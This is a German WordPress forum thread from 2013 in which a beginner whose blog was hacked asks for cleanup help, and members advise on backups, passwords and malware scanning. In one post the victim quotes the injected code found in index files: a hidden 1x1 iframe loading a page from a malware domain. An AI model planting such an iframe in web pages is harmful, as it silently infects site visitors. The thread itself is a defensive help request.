1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Wordpress Blog gehackt | dringend Hilfe

Dieses Thema im Forum "Allgemeines" wurde erstellt von Wordy2, 1. März 2013.

  1. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Hallo liebe Leuts,

    gut, dass es euch gibt. Mir wurde gestern mein Wordpress Blog gehackt, prompt bekam ich die Meldung von Google und eine Sicherheitswarnung wurde über meine Seite gelegt. Ich bin leider absoluter Neuling und kenne mich kaum aus. Habe in mehreren Index Dateien einen verdächtigen iFrame gefunden, den ich gelöscht habe. heute kam die Mail, dass nun auch meine andere Seite Malware enthält.

    Ich weis absolut nicht, was ich machen soll. Mein Webhoster schreibt mir 1-2 mal am Tag und seine Antwort war: Sie wurden gehackt, spielen Sie ein Backup ein.

    1. Ich habe keine Ahnung wie das funktioniert
    2. war das letzte Backup vor einem Monat, ist dann nicht alles weg?
    3. Eigentlich möchte ich einfach nur die Seite bereinigen und wieder frei machen.


    Wäre super, wenn ihr mir genaue Anweisungen geben würdet. Bitte aber Anfängertauglich, kann mit den Sachen, die ich so bei Google gefunden habe nichts anfangen:/

    Version auf Wordpress ist übrigens 3.5.1 aber wie gesagt beide Seiten wurden gehackt, die zweite hat kein Wordpress

    Danke
     
    #1 Wordy2, 1. März 2013
    Zuletzt bearbeitet: 1. März 2013
  2. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Meine Empfehlung, suche dir dafür einen Profi. Man kann das nicht in 3 Worten beschreiben, wie du die Malware beseitigst. Des weiteren musst du auch die Sicherheitslücke finden. Dafür ist einiges an Wissen nötig.
     
  3. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Hmm das wird doch sicherlich teuer werden...
    Mal angenommen ich würde das Backup der Dateien auf den FTP Server wieder draufspielen wäre dann alles von Viren befreit? Die Datenbank ist ja noch da, das heißt auch alle Artikel würden bestehen bleiben.
     
  4. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    hast du mal ne url? Vielleicht können wir schon feststellen ob einem von uns dein Virus bekannt ist,


    Je nach Art des Viruses dauert es für den Profi etwa 0,5-3 Stunden diesen zu entfernen, du kannst dir ja mal Angebote in der Jobbörse geben lassen


    wobei damit noch nicht die Sicherheitslücke geschlossen ist,
    hattest du ein sicheres Passwort für FTP und Wordpress (möglichst viele Zeichen, Umlaute, sonderzeichen, groß / kleinschriebung, zahlen)


    Und ja im Prinzip wäre es so möglich wie du beschrieben hast, vorrausgesetzt der Virus ist nicht in der Datenbank eingeschleißt, aber das kann man ja mit 1-2 Virenscans schnell feststellen (nach einspielen des Backups). Dazu solltest du zuvor alles einmal sichern (also die verseuchte seite) und alles ordner bis auf den upload ordner entfernen (weil du ja vermutlich neue artikel hast mit neuen bildern...) und danach das saubere Backup hochladen. Den Uplaod ordner auf seltsame Dateien überprüfen. Kann aber auch nur empfehlen das einen Profi machen zu lassen (ist antürlich abhänig von deinem Kenntnisstand über PHP / FTP / bla^^)
     
  5. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Vielen Dank erstmal für eure schnellen Antworten.

    Wenn ich es selbst nicht hinbekommen sollte werde ich das definitiv machen. Das Passwort bestand aus einem kleinen Wort udn eienr 4stelligen Zahl. Ist das denn die Schwachstelle?

    Wie funktioniert das denn genau mit dem Viren Scan, kannst du mir das eventuell beschreiben? Ich habe ja 2 Projekte auf dem Server, einen Upload Ordner zu finden wird also etwas schwer. Und wieso sollte man diesen entfernen?

    Ich hoffe, dass die datenbank nicht befallen ist. Da war in den Index Dateien der Wordpress Seite folgender Code drin:

    echo "<iframe src=\"http://sraphicshouldn.su/img2/count.htm\" width=\"1\" height=\"1\" frameborder=\"0\"></iframe>";

    Es handelt sich um die Seite www.try2fail.com Wenn man draufklickt kommt jedoch ein Trojaner, deshalb Warnung von mir. Bei der Wordpress Seite kommt komischerwise keine Meldung vom Rechner.

    Wie kann ich machen, dass man auf die Seite nicht zugreifen kann? Wäre wichtig, nicht dass mir eienr Stress macht. Will ja auch niemanden infizieren.
     
    #5 Wordy2, 1. März 2013
    Zuletzt bearbeitet: 1. März 2013
  6. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    :cry:, die Frage war gut. Da braucht man per Brute Force glaube ich nicht mal ne Sekunde. Ein Passwort sollte kryptisch min. 10 Stellen haben. Aber über deinen Hosting Anbieter musste ich auch ein wenig grinsen. Im Header steht die halbe Konfiguration seiner Servers drin. Das sollte man auch nicht machen ...
     
  7. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Mist, werde ich dann mal machen. Ich frage mich nur, wie die darauf auferksam geworden sind. Ging das automatisch oder sitzen da wirklich raffinierte Leute dahinter, die das per Hand machen?
    Jetzt hat der Anbieter mir geschrieben, ich solle alle FTP Dateien mit den alten überspielen.
    Ja der Anbieter ist echt lächerlich und hat einen schlechten Support, werde mich demnächst von dem wegbewegen. Kennt jemand einen Hoster, der günstig, sicher ist und bei solcehn Geschichtenn guten und schnellen Support anbietet? :)
     
  8. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    So etwas nennt man Grundrauschen und passiert automatisiert z.B. durch Bots.
     
  9. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.317
    Zustimmungen:
    582
    Hallo,

    Du kannst keiner Datei auch keiner Datei in dem upload Ordner mehr vertrauen. In der Regel findest du Veränderungen auch in diesem Ordner - weil hier oft sinnfreie Zugriffsrechte erlaubt sind.

    ALLES löschen ... sich einen anderen Provider suchen ... und ein Backup dort installieren... Auf Pluigins und Themes verzichten und Wordpress in der aktuellen Version verwenden...

    Bei dem neuen Provider Wordpress etwas abgesichert installieren
    http://www.spiegel.de/netzwelt/web/wordpress-so-sichern-sie-die-blog-maschine-ab-a-707286.html
     
  10. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Hätte ich ja nicht gedacht, dass so etwas automatisch geschieht! Wordpress 3.5.1 ist doch die aktuellste Version oder?

    Keine Themes mehr und komplett keine Plugins? Wieso das denn? Es müsste doch eine Möglichkeit geben, die irgendwo sicher herzubekommen.

    Ich werde mir, sobald ich die zweite Seite abgegeben habe einen neuen Provider suchen, hoffe ja, dass in der Zeit nicht nochmal soetwas passiert. Was haltet ihr enn von One?
     
  11. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    Einen Hoster der bei solchen Problemen Hilfestellung bietet UND auch langfristig zuverlässig ist zu finden dürfte schwierig werden. Es ist nicht die Aufgabe deines Webhosters sich um deine Sicherheitslücken zum Kümmern. In diesem Fall wohlmöglich ein viel zu schlechtes passwort.
     
  12. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Ok, aber besser geht sicher. Hat mich schon gewundert, dass der so günstig ist. Vielen Dank
    Kannst du mir noch sagen, wie ich die Dateien auf dem Server scannen kann und welches Progi gut ist?
     
  13. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    Die einzelnen Dateien scannen wird schweirig, dazu müßtest du die komplette webseite herunterladen und mit malwarebytes und einem virenscanner wie antivir etc scannen.

    Ich mache es mir meist einfacher: http://sucuri.net/ überprüft webseiten online und kennt so ziemlich jeden Webhack / Insert :) einfach nach dem entfernen der Malware einmal scannen lassen und nach ein paar Tagen nochmal.

    Natürlich können auch Dateien im Uplaod-Ordner verseucht sein, aber alles neu ist auch immer schwierig... und da die wahrscheinlichkeit eher gering ist... hauptsache es befinden sich keine .php oder .js dateien in den upload ordnern
     
  14. Wordy2

    Wordy2 Member

    Registriert seit:
    1. März 2013
    Beiträge:
    20
    Zustimmungen:
    0
    Vielen Dank für eure Hilfe, muss jetzt aber wohl Hilfe suchen. Wer das gerne (aber bitte günstig) übernehmen möchte, bitte besched sagen. Professionell würde mich 55 Euro kosten, ist mir aber doch noch zu teuer.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden